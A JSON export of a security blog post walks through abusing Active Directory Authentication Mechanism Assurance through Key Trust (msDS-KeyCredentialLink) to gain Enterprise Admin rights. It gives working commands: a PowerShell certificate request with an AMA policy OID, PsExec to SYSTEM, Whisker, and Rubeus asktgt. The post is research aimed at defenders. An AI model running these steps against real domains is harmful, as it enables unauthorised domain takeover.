{"id":1215,"date":"2025-02-24T21:51:11","date_gmt":"2025-02-24T20:51:11","guid":{"rendered":"https:\/\/blog.chrisse.se\/?p=1215"},"modified":"2025-02-24T23:03:58","modified_gmt":"2025-02-24T22:03:58","slug":"when-your-enterprise-pki-becomes-one-of-your-enemies-part-4","status":"publish","type":"post","link":"https:\/\/blog.chrisse.se\/?p=1215","title":{"rendered":"When your Enterprise PKI becomes one of your enemies (Part 4)"},"content":{"rendered":"\n<p>In the last blog post series &#8211; <a href=\"https:\/\/blog.chrisse.se\/?p=1187\" data-type=\"link\" data-id=\"https:\/\/blog.chrisse.se\/?p=1187\">When your Enterprise PKI becomes one of your enemies (Part 3)<\/a> we vent trough how Authentication Mechanism Assurance (AMA) works and how it can be abused together with Public Key Infrastructure (PKI) to compromise an Active Directory forest if it&#8217;s not designed the right way.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"584\" src=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/image-7.png\" alt=\"\" class=\"wp-image-1216\" srcset=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/image-7.png 1024w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/image-7-300x171.png 300w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/image-7-768x438.png 768w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/figure>\n\n\n\n<p>To summaries the abuse demonstrated in the post &#8211; here are the requirements (Note that the CA don&#8217;t have to be trusted in NTAuth)<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li class=\"indent40\">Obtain a certificate from a certificate authority (CA) that is trusted on the KDC and being able to supply the AMA Issuance Policy OID &#8211; this can be archived by:\n<ul class=\"wp-block-list\">\n<li>Certificate Template configured for &#8216;Supply in the request&#8217; &#8211; SITR<\/li>\n\n\n\n<li>Being delegated Certificate Manager on the certificate authority for one or more templates<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li class=\"indent40\">The KDC must have a valid certificate<\/li>\n\n\n\n<li class=\"indent40\">Being able to write to at least one user account&#8217;s altSecId (altSecurityIdentities) attribute.<\/li>\n<\/ol>\n\n\n\n<p><strong>Authentication Mechanism Assurance (AMA) abuse using Key Trust and KCL<\/strong><\/p>\n\n\n\n<p>Let&#8217;s demonstrate another way to abuse Authentication Mechanism Assurance (AMA) and change the requirements a bit &#8211; this is only possible against Windows Server 2016 KDCs and later.<\/p>\n\n\n\n<p>Windows Server 2016 introduced Key Trust model to the KDC where PKINIT can be performed using a explicit key trust instead of certificate trust. They key trust model works by mapping the public key of a private\/public key pair into the &#8216;msDS-KeyCredentialLink&#8217; attribute of a security principal deriverad from the user or computer class, authentication can then be performed by providing the public key. This functionality was mainly added to support Windows Hello for Business (WHFB) to allow other authentication methods to be used on top of PKINIT, it&#8217;s also utilized  with Entra ID &#8211; Kerberos Cloud Trust.<\/p>\n\n\n\n<p>For more information see &#8211; <a href=\"https:\/\/learn.microsoft.com\/en-us\/openspecs\/windows_protocols\/ms-pkca\/43cc84aa-4575-4452-bfd5-9758994b8f6f\">3.1.5.2.1.4 Key Trust<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"560\" src=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/image-8-1024x560.png\" alt=\"\" class=\"wp-image-1218\" srcset=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/image-8-1024x560.png 1024w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/image-8-300x164.png 300w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/image-8-768x420.png 768w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/image-8-1536x840.png 1536w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/image-8.png 1626w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/figure>\n\n\n\n<p>So what does the Key Trust model have to do with Authentication Mechanism Assurance (AMA)? <\/p>\n\n\n\n<p>We can think of the &#8216;msDS-KeyCredentialLink&#8217; as the &#8216;altSecurityIdentities&#8217; attribute in the previous abuse scenario &#8211; But there is one major difference a computer account can by default write to it&#8217;s own &#8216;msDS-KeyCredentialLink&#8217; attribute granted to the SELF security principal on every computer accounts default ACL &#8211; as long as the &#8216;msDS-KeyCredentialLink&#8217; is empty &#8211; <\/p>\n\n\n\n<p>This is interesting as it means there is no need to have any special access in the directory to upload the public key of our private\/public key pair as long as we can become \/ operate in the security context of just one domain joined computer account within the entire forest &#8211; doing so would require being local administrator at one of those boxes utilizing PsExec to become SYSTEM.<\/p>\n\n\n\n<p>Note all my demos uses \u2018<a href=\"https:\/\/github.com\/CarlSorqvist\/PsCertTools\/tree\/main\/CertReqTools\">CertRequestTools<\/a>\u2018 from Carl S\u00f6rqvist and in this case also <a href=\"https:\/\/github.com\/GhostPack\/Rubeus\">Rubeus <\/a>from Will Schroeder and <a href=\"https:\/\/github.com\/eladshamir\/Whisker\/\">Whisker<\/a> from Elad Shamir<\/p>\n\n\n\n<p>But first we need to obtain a certificate with the AMA Issuance Policy OID in order to abuse it &#8211; and enroll it to the machine, replace &lt;Template&gt; with a template in your environment configured for \u2013 Supply in the request (SITR) :<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#2f363c\">AMA-KCL.ps1<\/span><span role=\"button\" tabindex=\"0\" data-code=\"Import-Module -Name CertRequestTools\n# Chrisse Issuing CA1 is trusted in NTAUTH\n$CA1 = &quot;nttest-ca-01.nttest.chrisse.com\\Chrisse Issuing CA 1&quot;  \n# A0 AMA Policy OID (linked to Enterprise Admins)\n$AmaExtension = New-CertificatePoliciesExtension -Oid &quot;1.3.6.1.4.1.311.21.8.10665564.8181582.1918139.271632.11328427.90.1.402&quot;\n \nNew-PrivateKey -RsaKeySize 2048 -KeyName ([Guid]::NewGuid()) `\n| New-CertificateRequest `\n    -Subject &quot;CN=DEMO4&quot; `\n    -UserPrincipalName &quot;NTTEST-CL-01.nttest.chrisse.com&quot; `\n    -OtherExtension $AmaExtension `\n| Submit-CertificateRequest `\n    -ConfigString $CA1 `\n    -Template &lt;Template&gt; `\n| Install-Certificate -Name My -Location LocalMachine\" style=\"color:#24292eff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki min-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #6F42C1\">Import-Module<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Name CertRequestTools<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C2C3C5\"># Chrisse Issuing CA1 is trusted in NTAUTH<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CA1 <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;nttest-ca-01.nttest.chrisse.com\\Chrisse Issuing CA 1&quot;<\/span><span style=\"color: #24292EFF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #C2C3C5\"># A0 AMA Policy OID (linked to Enterprise Admins)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$AmaExtension <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #6F42C1\">New-CertificatePoliciesExtension<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Oid <\/span><span style=\"color: #22863A\">&quot;1.3.6.1.4.1.311.21.8.10665564.8181582.1918139.271632.11328427.90.1.402&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #6F42C1\">New-PrivateKey<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">RsaKeySize <\/span><span style=\"color: #1976D2\">2048<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">KeyName ([<\/span><span style=\"color: #D32F2F\">Guid<\/span><span style=\"color: #24292EFF\">]::NewGuid()) <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">|<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #6F42C1\">New-CertificateRequest<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Subject <\/span><span style=\"color: #22863A\">&quot;CN=DEMO4&quot;<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">UserPrincipalName <\/span><span style=\"color: #22863A\">&quot;NTTEST-CL-01.nttest.chrisse.com&quot;<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">OtherExtension $AmaExtension <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">|<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #6F42C1\">Submit-CertificateRequest<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">ConfigString $CA1 <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Template <\/span><span style=\"color: #D32F2F\">&lt;<\/span><span style=\"color: #24292EFF\">Template<\/span><span style=\"color: #D32F2F\">&gt;<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">|<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #6F42C1\">Install-Certificate<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Name My <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Location LocalMachine<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>Now it&#8217;s time to become the machine it self and act as SYSTEM on &#8221;NTTEST-CL-01.nttest.chrisse.com&#8221;<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#2f363c\">cmd<\/span><span role=\"button\" tabindex=\"0\" data-code=\"Psexec.exe -i -s C:\\WINDOWS\\system32\\cmd.exe\" style=\"color:#24292eff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki min-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #24292eff\">Psexec.exe -i -s C:\\WINDOWS\\system32\\cmd.exe<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>Now we&#8217;re going to add the public key of our certificate to the &#8216;msDS-KeyCredentialLink&#8217; attribute &#8211; to do this we use a tool named Whisker.<\/p>\n\n\n\n<p>Replace &lt;Hash&gt; with the hash of the certificate issued previously and lunch it in the cmd instance created by Psexec.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#2f363c\">cmd<\/span><span role=\"button\" tabindex=\"0\" data-code=\"whisker add \/target:NTTEST-CL-01$ \/path:&lt;HASH&gt;\" style=\"color:#24292eff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki min-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #24292eff\">whisker add \/target:NTTEST-CL-01$ \/path:&lt;HASH&gt;<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>Note that I&#8217;ve modified whisker slightly to look for a certificate by hash in the computer personal store also known as LocalMachine\\MY.<\/p>\n\n\n\n<p>Now the path is very similar to the previous abuse scenario demonstrated &#8211; we will use rubeus to perform a PKINIT with our certificate&#8217;s public key, it&#8217;s going to be matched with the key we just stored in &#8216;msDS-KeyCredentialLink&#8217; of the computer account &#8220;NTTEST-CL-01.nttest.chrisse.com&#8221;<\/p>\n\n\n\n<p>Note that I&#8217;ve modified rubeus slightly to also look for certificates by hash in the  computer personal store also known as LocalMachine\\MY.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#2f363c\">cmd<\/span><span role=\"button\" tabindex=\"0\" data-code=\"rubeus asktgt \/user:NTTEST-CL-01$ \/certificate:&lt;HASH&gt; \/enctype:aes256 \/createnetonly:C:\\Windows\\System32\\cmd.exe \/show\" style=\"color:#24292eff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki min-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #24292eff\">rubeus asktgt \/user:NTTEST-CL-01$ \/certificate:&lt;HASH&gt; \/enctype:aes256 \/createnetonly:C:\\Windows\\System32\\cmd.exe \/show<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>We should now be authenticated as the computer account &#8220;NTTEST-CL-01.nttest.chrisse.com&#8221; and having the extra two security groups &#8211; \u2018Enterprise Admins (AMA)\u2019 and \u2018Enterprise Admins\u2019 (RID 519) as part our token thanks to the AMA Issuance Policy being present in the certificate we authenticated with.<\/p>\n\n\n\n<p><br>You should now see something similar to the screen below, the cmd launched by rubeus should now have \u2018Enterprise Admin\u2019 privileges and you should be able to add a user to \u2018Domain Admins\u2019 as stated in the example.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"470\" src=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/3-1024x470.png\" alt=\"\" class=\"wp-image-1223\" srcset=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/3-1024x470.png 1024w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/3-300x138.png 300w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/3-768x353.png 768w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/3-1536x705.png 1536w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/3.png 1664w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/figure>\n\n\n\n<p><br><strong>Summary<\/strong><\/p>\n\n\n\n<p>The main difference using this path to abuse Authentication Mechanism Assurance (AMA) compared to the example demonstrated in the previous blog post is mainly two things.<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li class=\"indent40\">The ability to become local administrator at any computer within the Active Directory forest instead of having write access in Active Directory to a users &#8216;altSecurityIdentities&#8217; attribute.<\/li>\n\n\n\n<li class=\"indent40\">For this to work the certificate authority that the certificate is issued from must be from a certificate authority that is trusted in NTAuth.<\/li>\n<\/ol>\n\n\n\n<p>The requirement of being able to supply the AMA Issuance OID into the certificate still remains and can be achieved the same way.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"indent40\">Templates published on the Certificate Authority that are configured for Supply in the request &#8211; SITR.<\/li>\n\n\n\n<li class=\"indent40\">Being Certificate Manager on the CA over one or more templates<\/li>\n<\/ul>\n\n\n\n<p>One side effect of dealing with a key trust here instead of a certificate trust is that the KDC will ignore any validation errors such as CRL &#8211; that means if a certificate get issued for AMA abuse and stored in any computer accounts &#8216;altSecurityIdentities&#8217; in the forest &#8211; it would NOT help if you would revoke that certificate. Pretty bad isn&#8217;t it? In order to scan your forest you must obtain the public key for any certificate issued with the AMA Issuance Policy OID from all your Certificate Authorities and start scanning every single object with contents in &#8216;msDS-KeyCredentialLink&#8217; and it&#8217;s a linked multi-valued attribute.<\/p>\n\n\n\n<p><br>Authentication Mechanism Assurance (AMA) is a good feature if being deployed correctly for the reasons mentioned in the beginning of this post, binding strong privileges to certificate based authentication and just in time is a good thing for sure \u2013 the question remains what can we do to prevent the abuse of Authentication Mechanism Assurance (AMA) as described and demonstrated in this blog post? It\u2019s possible if you design your Public Key Infrastructure the right way and how it integrated with Active Directory and we\u2019re going to cover some alternatives on how this can be mitigated in coming blog posts.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>In the last blog post series &#8211; When your Enterprise PKI becomes one of your enemies (Part 3) we vent trough how Authentication Mechanism Assurance (AMA) works and how it can be abused together with Public Key Infrastructure (PKI) to compromise an Active Directory forest if it&#8217;s not designed the right way. To summaries the &hellip; <\/p>\n<p class=\"link-more\"><a href=\"https:\/\/blog.chrisse.se\/?p=1215\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> &#8220;When your Enterprise PKI becomes one of your enemies (Part 4)&#8221;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"footnotes":""},"categories":[36],"tags":[6,32,30,31],"class_list":["post-1215","post","type-post","status-publish","format-standard","hentry","category-public-key-infrastructure-pki","tag-active-directory","tag-adcs","tag-pki","tag-sitr"],"_links":{"self":[{"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=\/wp\/v2\/posts\/1215","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1215"}],"version-history":[{"count":10,"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=\/wp\/v2\/posts\/1215\/revisions"}],"predecessor-version":[{"id":1232,"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=\/wp\/v2\/posts\/1215\/revisions\/1232"}],"wp:attachment":[{"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1215"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1215"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1215"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}